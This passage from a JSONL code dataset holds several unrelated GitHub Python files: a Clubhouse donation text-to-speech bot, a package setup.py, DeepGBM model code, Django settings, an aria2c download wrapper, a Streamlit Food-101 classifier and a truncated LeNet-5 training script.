clubhouse_config.get('user_id')\n self.user_token = clubhouse_config.get('user_token')\n self.user_device = clubhouse_config.get('user_device')\n self.channel_id = clubhouse_config.get('channel_id')\n self.language = clubhouse_config.get('language')\n\n\nclass DaConfig(BaseModel):\n client_id: Optional[int]\n client_secret: Optional[str]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n config = utils.read_da_config()\n self.client_id = config.get('client_id')\n self.client_secret = config.get('client_secret')\n\n\nch_config = ClubhouseConfig()\nclient = Clubhouse(user_id=ch_config.user_id,\n user_token=ch_config.user_token,\n 
user_device=ch_config.user_device)\n\nda_config = DaConfig()\nda = da.DonationAlertsApi(da_config.client_id,\n da_config.client_secret,\n settings.REDIRECT_URI,\n settings.SCOPE)\n\n\n@app.get('/index')\nasync def index():\n if not (ch_config.user_id\n and ch_config.user_token\n and ch_config.user_device\n and ch_config.channel_id\n and ch_config.language):\n return RedirectResponse('/enter_phone')\n\n if not (da_config.client_id and da_config.client_secret):\n return RedirectResponse('/da_config')\n\n return RedirectResponse(da.authorize())\n\n\n@app.get('/')\nasync def default_handler():\n return ''\n\n\n@app.get('/code')\nasync def da_code_handler(background_tasks: BackgroundTasks,\n code: str = Query(...),):\n da.get_access_token(code)\n da.get_user_info()\n background_tasks.add_task(connect)\n return RedirectResponse('/', status_code=status.HTTP_303_SEE_OTHER)\n\n\n@app.get('/enter_phone', response_class=HTMLResponse)\nasync def enter_phone_page(request: Request):\n return templates.TemplateResponse('enter_phone.html', {\"request\": request})\n\n\n@app.post('/clubhouse_auth', response_class=HTMLResponse)\nasync def clubhouse_config_page(request: Request,\n phone_number: str = Form(...)):\n client.start_phone_number_auth(phone_number)\n return templates.TemplateResponse('clubhouse_config.html',\n {\"request\": request,\n 'phone_number': phone_number})\n\n\n@app.post('/clubhouse_config')\nasync def clubhouse_config_handler(phone_number: str = Form(...),\n code: str = Form(...),\n channel: str = Form(...),\n lang: str = Form(...)):\n data = client.complete_phone_number_auth(phone_number, code)\n if 'user_profile' in data:\n ch_config.user_id = str(data['user_profile']['user_id'])\n ch_config.user_token = data['auth_token']\n ch_config.user_device = client.HEADERS.get(\"CH-DeviceId\")\n ch_config.channel_id = channel\n ch_config.language = lang\n\n utils.write_ch_config(str(data['user_profile']['user_id']),\n data['auth_token'],\n client.HEADERS.get(\"CH-DeviceId\"),\n channel,\n lang)\n\n return RedirectResponse('/index', status_code=status.HTTP_303_SEE_OTHER)\n\n\n@app.get('/da_config', response_class=HTMLResponse)\nasync def da_config_page(request: Request):\n return templates.TemplateResponse('da_config.html',\n {\"request\": request})\n\n\n@app.post('/da_config')\nasync def da_config_handler(client_id: int = Form(...),\n client_secret: str = Form(...)):\n da_config.client_id = client_id\n da_config.client_secret = client_secret\n da.client_id = client_id\n da.client_secret = client_secret\n utils.write_da_config(client_id, client_secret)\n return RedirectResponse('/index', status_code=status.HTTP_303_SEE_OTHER)\n\n\nasync def clubhouse_ping():\n while True:\n print('PING')\n client.active_ping(ch_config.channel_id)\n await asyncio.sleep(300)\n\n\nasync def connect():\n ch_config = ClubhouseConfig()\n client = Clubhouse(user_id=ch_config.user_id,\n user_token=ch_config.user_token,\n user_device=ch_config.user_device)\n async with websockets.connect(settings.CENTRIFUGO_WS) as ws:\n print('DA CONNECTED')\n await ws.send(json.dumps(da.ws_authorize()))\n data = await ws.recv()\n data = json.loads(data)\n da.set_centrifugo_client_id(data['result']['client'])\n da.subscribe()\n await ws.send(json.dumps(da.ws_connect()))\n await ws.recv()\n await ws.recv()\n\n RTC = agorartc.createRtcEngineBridge()\n event_handler = agorartc.RtcEngineEventHandlerBase()\n RTC.initEventHandler(event_handler)\n # 0xFFFFFFFE will exclude Chinese servers from Agora's servers.\n 
RTC.initialize(Clubhouse.AGORA_KEY,\n None,\n agorartc.AREA_CODE_GLOB & 0xFFFFFFFE)\n # Enhance voice quality\n RTC.setAudioProfile(agorartc.AUDIO_PROFILE_MUSIC_HIGH_QUALITY_STEREO,\n agorartc.AUDIO_SCENARIO_GAME_STREAMING)\n\n channel_info = client.join_channel(ch_config.channel_id)\n\n asyncio.create_task(clubhouse_ping())\n\n channel_token = channel_info['token']\n users = channel_info['users']\n\n speaker_permission = False\n while not speaker_permission:\n for user in users:\n if bool(user['is_speaker']):\n data = client.accept_speaker_invite(ch_config.channel_id,\n user['user_id'])\n if data['success']:\n speaker_permission = True\n break\n print('Please, invite')\n await asyncio.sleep(10)\n\n while True:\n data = await ws.recv()\n data = json.loads(data)\n print(data)\n data = data['result']['data']['data']\n username = data['username']\n message = data['message']\n text_to_speech = f'Message from {username}. {message}'\n tts_obj = gTTS(text=text_to_speech,\n lang=ch_config.language,\n slow=False)\n tts_obj.save('donation.mp3')\n\n RTC.joinChannel(channel_token,\n ch_config.channel_id,\n \"\",\n int(ch_config.user_id))\n await asyncio.sleep(0.1)\n RTC.startAudioMixing('donation.mp3', False, True, 1)\n donation_duration = RTC.getAudioMixingDuration()\n await asyncio.sleep(donation_duration / 1000 + 0.5)\n RTC.leaveChannel()\n","repo_name":"kirillkuzin/donatehouse","sub_path":"donatehouse/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"4588856858","text":"# from os import path\nfrom io import open\nfrom setuptools import setup, find_packages\n\n\ndef read(f):\n return open(f, \"r\", encoding='utf-8').read()\n\n\nsetup(\n name=\"amocrm-api-wrapper\",\n version='0.0.17',\n packages=find_packages(exclude=(\"tests\",)),\n install_requires=[\n \"requests\",\n ],\n description=\"Amocrm api wrapper v4\",\n author=\"bzdvdn\",\n author_email=\"bzdv.dn@gmail.com\",\n url=\"https://github.com/bzdvdn/amocrm-api-wrapper\",\n license=\"MIT\",\n python_requires=\">=3.6\",\n long_description=read(\"README.md\"),\n long_description_content_type=\"text/markdown\",\n)\n","repo_name":"bzdvdn/amocrm-api-wrapper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"1783087237","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2022/11/25 15:22\n\n@author: Yang Fan\n\nModel components: LightGBM training, grouping of multiple trees, the Embedding model, and the GBDT2NN model\n\"\"\"\nimport math\n\nimport lightgbm as lgb\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport wandb\nfrom utils import ModelInterpreter\nfrom wandb.lightgbm import wandb_callback\n\n\n# Train the LightGBM model\ndef TrainGBDT(train_x, train_y, test_x, test_y):\n params = {\n \"task\": \"train\",\n \"boosting_type\": \"gbdt\",\n \"num_class\": 1,\n \"objective\": \"regression\",\n \"metric\": \"mse\",\n \"boost_from_average\": True,\n \"num_leaves\": wandb.config.num_leaves,\n \"feature_fraction\": wandb.config.feature_fraction,\n \"bagging_freq\": wandb.config.bagging_freq,\n \"bagging_fraction\": wandb.config.bagging_fraction,\n \"num_threads\": wandb.config.num_threads,\n \"learning_rate\": wandb.config.tree_lr,\n \"seed\": wandb.config.seed,\n }\n lgb_train = lgb.Dataset(train_x, train_y.reshape(-1), params=params)\n lgb_eval = lgb.Dataset(test_x, test_y.reshape(-1), reference=lgb_train)\n # early_stop_callback 
= lgb.early_stopping(\n # stopping_rounds=wandb.config.early_stopping_rounds\n # )\n gbm = lgb.train(\n params,\n lgb_train,\n num_boost_round=wandb.config.num_trees,\n valid_sets=[lgb_eval],\n callbacks=[wandb_callback()],\n )\n preds = gbm.predict(test_x, raw_score=True)\n preds = preds.astype(np.float32)\n return gbm, preds\n\n\n# Split the n trees into groups\ndef SubGBDTLeaf_cls(train_x, test_x, gbm):\n num_slices = wandb.config.num_slices\n MAX = train_x.shape[1]\n\n # get leaf prediction index\n leaf_preds = gbm.predict(train_x, pred_leaf=True).reshape(\n train_x.shape[0], -1\n )\n test_leaf_preds = gbm.predict(test_x, pred_leaf=True).reshape(\n test_x.shape[0], -1\n )\n n_trees = leaf_preds.shape[1]\n\n # get leaf output from each tree\n leaf_output = np.zeros(\n [n_trees, wandb.config.num_leaves], dtype=np.float32\n )\n for tree_id in range(n_trees):\n num_leaf = np.max(leaf_preds[:, tree_id]) + 1\n for leaf_id in range(num_leaf):\n leaf_output[tree_id][leaf_id] = gbm.get_leaf_output(\n tree_id, leaf_id\n )\n\n modelI = ModelInterpreter(gbm)\n clusterIdx = modelI.EqualGroup(num_slices)\n n_feature = wandb.config.feature_per_group\n treeI = modelI.trees\n\n for n_idx in range(num_slices):\n tree_indices = np.where(clusterIdx == n_idx)[0]\n trees = {}\n tid = 0\n for jdx in tree_indices:\n trees[str(tid)] = treeI[jdx].raw\n tid += 1\n\n all_hav = {}\n for jdx, tree in enumerate(tree_indices):\n for kdx, f in enumerate(treeI[tree].feature):\n if f == -2:\n continue\n if f not in all_hav:\n all_hav[f] = 0\n all_hav[f] += treeI[tree].gain[kdx]\n\n all_hav = sorted(all_hav.items(), key=lambda kv: -kv[1])\n used_features = [item[0] for item in all_hav[:n_feature]]\n\n for kdx in range(max(0, n_feature - len(used_features))):\n used_features.append(MAX)\n cur_leaf_preds = leaf_preds[:, tree_indices]\n cur_test_leaf_preds = test_leaf_preds[:, tree_indices]\n new_train_y = np.zeros(train_x.shape[0])\n for jdx in tree_indices:\n new_train_y += np.take(\n leaf_output[jdx, :].reshape(-1), leaf_preds[:, jdx].reshape(-1)\n )\n new_train_y = new_train_y.reshape(-1, 1).astype(np.float32)\n yield used_features, new_train_y, cur_leaf_preds, cur_test_leaf_preds, np.mean(\n np.take(leaf_output, tree_indices, 0)\n ), np.mean(\n leaf_output\n )\n\n\nclass BatchDense(nn.Module):\n def __init__(self, batch, in_features, out_features, bias_init=None):\n super(BatchDense, self).__init__()\n self.batch = batch\n self.in_features = in_features\n self.out_features = out_features\n self.weight = nn.Parameter(\n torch.Tensor(batch, in_features, out_features), requires_grad=True\n )\n self.bias = nn.Parameter(\n torch.Tensor(batch, 1, out_features), requires_grad=True\n )\n self.reset_parameters(bias_init)\n\n def reset_parameters(self, bias_init=None):\n stdv = math.sqrt(6.0 / (self.in_features + self.out_features))\n self.weight.data.uniform_(-stdv, stdv)\n if bias_init is not None:\n self.bias.data = torch.from_numpy(bias_init)\n else:\n self.bias.data.fill_(0)\n\n def forward(self, x):\n size = x.size()\n # Todo: avoid the swap axis\n x = x.view(x.size(0), self.batch, -1)\n out = x.transpose(0, 1).contiguous()\n out = torch.baddbmm(self.bias, out, self.weight)\n out = out.transpose(0, 1).contiguous()\n out = out.view(x.size(0), -1)\n return out\n\n\nclass EmbeddingModel(nn.Module):\n def __init__(\n self,\n n_models,\n max_ntree_per_split,\n embsize,\n maxleaf,\n n_output,\n out_bias=None,\n task=\"regression\",\n ):\n super(EmbeddingModel, self).__init__()\n self.task = task\n self.n_models = n_models\n self.maxleaf = maxleaf\n 
self.fcs = nn.ModuleList()\n self.max_ntree_per_split = max_ntree_per_split\n\n self.embed_w = nn.Parameter(\n torch.Tensor(n_models, max_ntree_per_split * maxleaf, embsize),\n requires_grad=True,\n )\n # torch.nn.init.xavier_normal(self.embed_w)\n stdv = math.sqrt(1.0 / (max_ntree_per_split))\n self.embed_w.data.normal_(0, stdv) # .uniform_(-stdv, stdv)\n\n self.bout = BatchDense(n_models, embsize, 1, out_bias)\n self.bn = nn.BatchNorm1d(embsize * n_models)\n self.tanh = nn.Tanh()\n self.sigmoid = nn.Sigmoid()\n # self.output_fc = Dense(n_models * embsize, n_output)\n self.dropout = torch.nn.Dropout()\n if task == \"regression\":\n self.criterion = nn.MSELoss()\n else:\n self.criterion = nn.BCELoss()\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\"\n )\n\n def one_hot(self, y, numslot, mask=None):\n y_tensor = (\n y.type(torch.LongTensor).contiguous().view(-1, 1).to(self.device)\n )\n tmp = torch.zeros(\n y_tensor.size()[0],\n numslot,\n device=self.device,\n dtype=torch.float32,\n requires_grad=False,\n ).to(self.device)\n y_one_hot = tmp.scatter_(1, y_tensor.to(self.device), 1)\n if mask is not None:\n y_one_hot = y_one_hot * mask\n y_one_hot = y_one_hot.view(y.shape[0], -1)\n return y_one_hot\n\n def batchmul(self, x, models, embed_w, length):\n out = self.one_hot(x, length)\n out = out.view(x.size(0), models, -1)\n out = out.transpose(0, 1).contiguous()\n out = torch.bmm(out, embed_w)\n out = out.transpose(0, 1).contiguous()\n out = out.view(x.size(0), -1)\n return out\n\n def lastlayer(self, x):\n out = self.batchmul(x, self.n_models, self.embed_w, self.maxleaf)\n out = self.bn(out)\n return out\n\n def forward(self, x):\n out = self.lastlayer(x)\n out = self.dropout(out)\n out = out.view(x.size(0), self.n_models, -1)\n out = self.bout(out)\n # out = self.output_fc(out)\n sum_out = torch.sum(out, -1, True)\n if self.task != \"regression\":\n return self.sigmoid(sum_out), out\n return sum_out, out\n\n def joint_loss(self, out, target, out_inner, target_inner, *args):\n return nn.MSELoss()(out_inner, target_inner)\n\n def true_loss(self, out, target):\n return self.criterion(out, target)\n\n\nclass GBDT2NN(nn.Module):\n def __init__(\n self,\n input_size,\n used_features,\n tree_layers,\n output_w,\n output_b,\n device=None,\n ):\n super(GBDT2NN, self).__init__()\n print(\"Init GBDT2NN\")\n self.n_models = len(used_features)\n self.tree_layers = tree_layers\n n_feature = len(used_features[0])\n used_features = np.asarray(used_features).reshape(-1)\n self.used_features = nn.Parameter(\n torch.from_numpy(used_features).to(device), requires_grad=False\n )\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n assert len(tree_layers) > 0\n self.bdenses = nn.ModuleList()\n self.bns = nn.ModuleList()\n self.bdenses.append(\n BatchDense(self.n_models, n_feature, tree_layers[0])\n )\n for i in range(1, len(tree_layers)):\n self.bdenses.append(\n BatchDense(self.n_models, tree_layers[i - 1], tree_layers[i])\n )\n for i in range(len(tree_layers) - 1):\n self.bns.append(nn.BatchNorm1d(tree_layers[i] * self.n_models))\n self.out_weight = nn.Parameter(\n torch.from_numpy(output_w).to(device), requires_grad=False\n )\n self.out_bias = nn.Parameter(\n torch.from_numpy(output_b).to(device), requires_grad=False\n )\n print(\"Init GBDT2NN succeed!\")\n self.criterion = nn.MSELoss()\n self.device = device\n\n def batchmul(self, x, f):\n out = x.view(x.size(0), self.n_models, -1)\n out = f(out)\n out = out.view(x.size(0), -1)\n return out\n\n def lastlayer(self, x):\n 
out = torch.index_select(\n x.to(self.device), dim=1, index=self.used_features.to(self.device)\n )\n for i in range(len(self.bdenses) - 1):\n out = self.batchmul(out, self.bdenses[i])\n out = self.bns[i](out)\n out = self.relu(out)\n return out\n\n def forward(self, x):\n out = self.lastlayer(x.float())\n pred = self.batchmul(out, self.bdenses[-1])\n out = torch.addmm(self.out_bias, pred, self.out_weight)\n return out, pred\n\n def emb_loss(self, emb_pred, emb_target):\n loss_weight = torch.abs(torch.sum(self.out_weight, 1))\n l2_loss = (\n nn.MSELoss(reduction=\"none\")(emb_pred, emb_target) * loss_weight\n )\n return torch.mean(torch.sum(l2_loss, dim=1))\n\n def joint_loss(self, out, target, emb_pred, emb_target, ratio):\n return (1 - ratio) * self.criterion(\n out, target\n ) + ratio * self.emb_loss(emb_pred, emb_target)\n\n def true_loss(self, out, target):\n return self.criterion(out.to(self.device), target.to(self.device))\n","repo_name":"ELKYang/quant_research","sub_path":"2.DeepGBM/model_components.py","file_name":"model_components.py","file_ext":"py","file_size_in_byte":10689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6552344261","text":"# Django settings\n\ntry:\n from local_settings import *\nexcept ImportError:\n import sys\n sys.stderr.write(\"Error importing local settings. Did you remember to make a local_settings.py?\\n\");\n sys.exit(1)\n\n\nADMINS = (\n ('Carl Jackson', 'ctj@mit.edu'),\n)\n\nMANAGERS = ADMINS\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# URL prefix for admin media -- CSS, JavaScript and images. 
Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\n# ADMIN_MEDIA_PREFIX = '/admin/media/'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.csrf.middleware.CsrfMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nTEMPLATE_DIRS = (\n SITE_ROOT + 'templates/',\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.humanize',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin',\n 'registration',\n 'competition',\n 'abacus',\n)\n\n# Email stuff\nDEFAULT_FROM_EMAIL = 'Harvard-MIT Mathematics Tournament '\nEMAIL_PREFIX = '[HMMT] '\n\n# Login stuff\nLOGIN_URL = '/february/accounts/login/'\nLOGIN_REDIRECT_URL = '/february/registration/teams/'\n","repo_name":"zenazn/coatl","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"38932638129","text":"\nimport subprocess\n\n__download_tools = {}\n\ndefault_config = {\n \"aria2\": {\n \"extra_opts\": (\"-s10\", \"-x10\")\n }\n}\n\n\ndef get_download_tool(name):\n return __download_tools.get(name, None)\n\ndef download_tool(name):\n def register(cls):\n config = default_config.get(name, None)\n assert isinstance(config, dict)\n if config:\n __download_tools[name] = cls(**config)\n else:\n __download_tools[name] = cls()\n return cls\n return register\n\n\nclass DownloadTool(object):\n \"\"\"\n Interface definition for all download tools\n \"\"\"\n def download(self, uri='', resume=True, dir_path=\"\", file_name=\"\", headers=\"\"):\n pass\n\n@download_tool(\"aria2\")\nclass Aria2(DownloadTool):\n def __init__(self, default_header=\"\", extra_opts=None):\n self.__default_headers = default_header\n self.__extra_opts = None\n if isinstance(extra_opts, str):\n self.__extra_opts = extra_opts.split()\n elif type(extra_opts) in (list, tuple):\n self.__extra_opts = extra_opts\n elif extra_opts is not None:\n self.__extra_opts = str(extra_opts).split()\n\n def download(self, uri='', resume=True, dir_path=\"\", file_name=\"\", headers=\"\"):\n aria2_opts = ['aria2c', '--header=' + headers, uri, '--dir', dir_path, '--out', file_name, '--file-allocation=none']\n if resume:\n aria2_opts.append('-c')\n if self.__extra_opts:\n aria2_opts.extend(self.__extra_opts)\n exit_code = subprocess.call(aria2_opts)\n if exit_code != 0:\n raise Exception('aria2c exited abnormally')\n","repo_name":"pandazxx/music163","sub_path":"downloadtool.py","file_name":"downloadtool.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14654024386","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport streamlit as st\r\nfrom PIL import Image\r\nimport random\r\n\r\n# list of all 101 class names\r\nclass_names = ['apple_pie',\r\n 'baby_back_ribs',\r\n 'baklava',\r\n 'beef_carpaccio',\r\n 
'beef_tartare',\r\n 'beet_salad',\r\n 'beignets',\r\n 'bibimbap',\r\n 'bread_pudding',\r\n 'breakfast_burrito',\r\n 'bruschetta',\r\n 'caesar_salad',\r\n 'cannoli',\r\n 'caprese_salad',\r\n 'carrot_cake',\r\n 'ceviche',\r\n 'cheesecake',\r\n 'cheese_plate',\r\n 'chicken_curry',\r\n 'chicken_quesadilla',\r\n 'chicken_wings',\r\n 'chocolate_cake',\r\n 'chocolate_mousse',\r\n 'churros',\r\n 'clam_chowder',\r\n 'club_sandwich',\r\n 'crab_cakes',\r\n 'creme_brulee',\r\n 'croque_madame',\r\n 'cup_cakes',\r\n 'deviled_eggs',\r\n 'donuts',\r\n 'dumplings',\r\n 'edamame',\r\n 'eggs_benedict',\r\n 'escargots',\r\n 'falafel',\r\n 'filet_mignon',\r\n 'fish_and_chips',\r\n 'foie_gras',\r\n 'french_fries',\r\n 'french_onion_soup',\r\n 'french_toast',\r\n 'fried_calamari',\r\n 'fried_rice',\r\n 'frozen_yogurt',\r\n 'garlic_bread',\r\n 'gnocchi',\r\n 'greek_salad',\r\n 'grilled_cheese_sandwich',\r\n 'grilled_salmon',\r\n 'guacamole',\r\n 'gyoza',\r\n 'hamburger',\r\n 'hot_and_sour_soup',\r\n 'hot_dog',\r\n 'huevos_rancheros',\r\n 'hummus',\r\n 'ice_cream',\r\n 'lasagna',\r\n 'lobster_bisque',\r\n 'lobster_roll_sandwich',\r\n 'macaroni_and_cheese',\r\n 'macarons',\r\n 'miso_soup',\r\n 'mussels',\r\n 'nachos',\r\n 'omelette',\r\n 'onion_rings',\r\n 'oysters',\r\n 'pad_thai',\r\n 'paella',\r\n 'pancakes',\r\n 'panna_cotta',\r\n 'peking_duck',\r\n 'pho',\r\n 'pizza',\r\n 'pork_chop',\r\n 'poutine',\r\n 'prime_rib',\r\n 'pulled_pork_sandwich',\r\n 'ramen',\r\n 'ravioli',\r\n 'red_velvet_cake',\r\n 'risotto',\r\n 'samosa',\r\n 'sashimi',\r\n 'scallops',\r\n 'seaweed_salad',\r\n 'shrimp_and_grits',\r\n 'spaghetti_bolognese',\r\n 'spaghetti_carbonara',\r\n 'spring_rolls',\r\n 'steak',\r\n 'strawberry_shortcake',\r\n 'sushi',\r\n 'tacos',\r\n 'takoyaki',\r\n 'tiramisu',\r\n 'tuna_tartare',\r\n 'waffles']\r\n\r\n\r\n# loading the modle\r\n@st.cache(allow_output_mutation=True) # setting up cache for the model\r\ndef load_model():\r\n model = tf.keras.models.load_model('effi_080_second.h5')\r\n return model\r\n\r\n# call the model to predict the class of the image\r\nmodel = load_model()\r\n\r\n# showing a Header\r\n# st.title('Food 101 Classifier™')\r\nst.markdown(\"
<h1>Food 101 Classifier™</h1>
\", unsafe_allow_html=True)\r\nst.write('A image classifier based on the Food 101 dataset')\r\ncol1, col2 = st.beta_columns(2)\r\n\r\n\r\n# Asking for file\r\nfile = col2.file_uploader(\"Upload an image of food\", type=[\"png\", \"jpg\"])\r\n#food images list\r\nsam_lst = ['None', 'Icecream', 'Pizza', 'Waffels', 'Steak']\r\n# random greet !!!\r\ng_lst = ['you ordered >> ', 'so you like >> ', 'want to have some >> ', \"your today's lunch >> \", \"your favorite food is >> \", \"serving >> \"]\r\n# getting random greeting\r\ngreet = random.choice(g_lst)\r\n\r\n\r\n# function for predicting food class with a custom image\r\ndef predict_class(file, greet):\r\n \"\"\"Functon that will prepare the images and will predict the class\"\"\"\r\n img = Image.open(file)\r\n img2 = img.copy()\r\n img2.resize((300, 300))\r\n col1.image(img2,caption=f\"Looks Delicious!! \", use_column_width=True)\r\n # converting the image to a numpy array\r\n img_array = np.array(img)\r\n # reshaping the image to a 4d tensor usable by the model\r\n img = tf.image.resize(img_array, size=(224,224))\r\n img = tf.expand_dims(img, axis=0)\r\n pred = model.predict(img)\r\n pred_cls = class_names[pred.argmax()]\r\n col2.success(greet + pred_cls) # showing the prediction class name\r\n\r\n\r\n# prdeicting the class of the image from the file / custome image and samples\r\nif file is not None:\r\n with st.spinner('Hold on your food is getting cooked...'):\r\n predict_class(file, greet)\r\nelse:\r\n col1.warning(\"No image uploaded. You can use sample imgaes from below list\")\r\n file2 = col1.selectbox('Select from sample images', options=sam_lst)\r\n if file2 == 'Icecream':\r\n file = 'icecream.jpg'\r\n with st.spinner('Hold on your food is getting cooked...'):\r\n predict_class(file, greet)\r\n elif file2 == 'Pizza':\r\n file = 'pizza.jpg'\r\n with st.spinner('Hold on your food is getting cooked...'):\r\n predict_class(file, greet)\r\n elif file2 == 'Waffels': \r\n file = 'waffels.jpg'\r\n with st.spinner('Hold on your food is getting cooked...'):\r\n predict_class(file, greet) \r\n elif file2 == 'Steak':\r\n file = 'steak.jpg'\r\n with st.spinner('Hold on your food is getting cooked...'): \r\n predict_class(file, greet) \r\n else:\r\n pass\r\n \r\nnote = \"\"\" \r\n\\n\r\nThis project based on the [Food101](https://data.vision.ee.ethz.ch/cvl/datasets_extra/food-101/) Paper which used Convolutional Neuranetwork trained for 2 to 3 days to achieve 77.4% top-1 accuracy.\r\nThe project is made by download the food101 dataset from the [TensorFlow dataset](https://www.tensorflow.org/datasets/catalog/food101)(size: 4.6GB) which consists of 750 images x 101 training classes = 75750 training images.\r\nI used the [EfficientNetB0](https://www.tensorflow.org/api_docs/python/tf/keras/applications/EfficientNetB0) model with fine-tune unfreeze all layers of the model. \\n\r\nAlthough this WebApp model accuracy is around 80% to 82%. 
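As a rough sketch of the fine-tuning setup described here (the real code lives in the notebook linked below; the optimizer, learning rate and layer wiring shown are illustrative assumptions, while the 224x224 input size and the 101-class softmax head are taken from the app code above):
```python
import tensorflow as tf

# EfficientNetB0 backbone, pretrained on ImageNet, with every layer unfrozen
base = tf.keras.applications.EfficientNetB0(include_top=False, weights="imagenet")
base.trainable = True  # fine-tune all layers, as described above

inputs = tf.keras.Input(shape=(224, 224, 3))  # matches the resize in predict_class
x = tf.keras.layers.GlobalAveragePooling2D()(base(inputs))
outputs = tf.keras.layers.Dense(101, activation="softmax")(x)  # one unit per food class

model = tf.keras.Model(inputs, outputs)
model.compile(optimizer=tf.keras.optimizers.Adam(1e-4),
              loss="sparse_categorical_crossentropy",
              metrics=["accuracy"])
```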
I am also sharing the [notebook](https://colab.research.google.com/drive/15sJJhrZBo12CA3flnrX-NC4WwrP84z0D?usp=sharing) for this project.\r\n[Github](https://github.com/subha996/food-101_updated)\r\n\"\"\"\r\nst.write(note)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nwith st.beta_expander('Food Names(Classes), The model will work better if you chose food from this list'):\r\n st.write(class_names)\r\n","repo_name":"subha996/food-101_updated","sub_path":"food101.py","file_name":"food101.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17250694840","text":"#!/usr/bin/env python\n\"\"\"\nThis file contains LeNet-5 training script\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n#-------------------------------------------------------------------------------\n__author__ = \"Ando Ki\"\n__copyright__ = \"Copyright 2020 Ando Ki\"\n__credits__ = [\"none\", \"some\"]\n__license__ = \"The 2-Clause BSD License\"\n__version__ = \"0\"\n__revision__ = \"1\"\n__maintainer__ = \"Ando Ki\"\n__email__ = \"contact@future-ds.com\"\n__status__ = \"Development\"\n__date__ = \"2020.10.01\"\n__description__= \"LeNet-5 network model training script\"\n\n#-------------------------------------------------------------------------------\n# Note it saves parameter-only and model-included as swll.\n#-------------------------------------------------------------------------------\nimport argparse\nimport shutil\nimport os\nimport sys\n\nimport numpy as np\n\nimport torch\nfrom torchvision.datasets import mnist\nfrom torch.nn import CrossEntropyLoss\nfrom torch.optim import SGD\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\n# Following causes AttributeError: 'SummaryWriter' object has no attribute 'export_scalars_to_json'\n#from torch.utils.tensorboard import SummaryWriter\nfrom tensorboardX import SummaryWriter\n\nfrom darknet_lenet5_utils import *\nfrom lenet5_model import Lenet5Model\n\n#-------------------------------------------------------------------------------\ndef get_dataset( args ):\n \"\"\"\n It prepares MNIST dataset.\n \"\"\"\n train_dataset = mnist.MNIST( root='dataset.train' # see train/MNIST/\n , train=True\n , download=True\n , transform=transforms.Compose([\n transforms.Resize((32, 32))\n ,transforms.Grayscale(num_output_channels=args.input_channels) # make 3 channels (does not work)\n ,transforms.ToTensor()]))\n test_dataset = mnist.MNIST( root='dataset.test'\n , train=False\n , download=True\n , transform=transforms.Compose([\n transforms.Resize((32, 32))\n ,transforms.Grayscale(num_output_channels=args.input_channels) # make 3 channels (does not work)\n ,transforms.ToTensor()]))\n train_loader = DataLoader( train_dataset\n , batch_size=args.batch_size\n , num_workers=8)\n test_loader = DataLoader( test_dataset\n , batch_size=args.batch_size\n , num_workers=8)\n return train_loader, test_loader\n\n#-------------------------------------------------------------------------------\ndef build_model( args ):\n \"\"\"\n It build LeNet-5 model and load checkpoint if specified.\n \"\"\"\n if args.pre_trained_type == 'none':\n model = Lenet5Model(args.input_channels)\n else:\n extension = os.path.splitext(args.pre_trained_weights)[1]\n if extension == '.pkl': # args.pre_trained_weights.endswitch('.pkl')\n model = torch.load(args.pre_trained_weights)\n elif extension == '.pth':\n if args.pre_trained_type == 
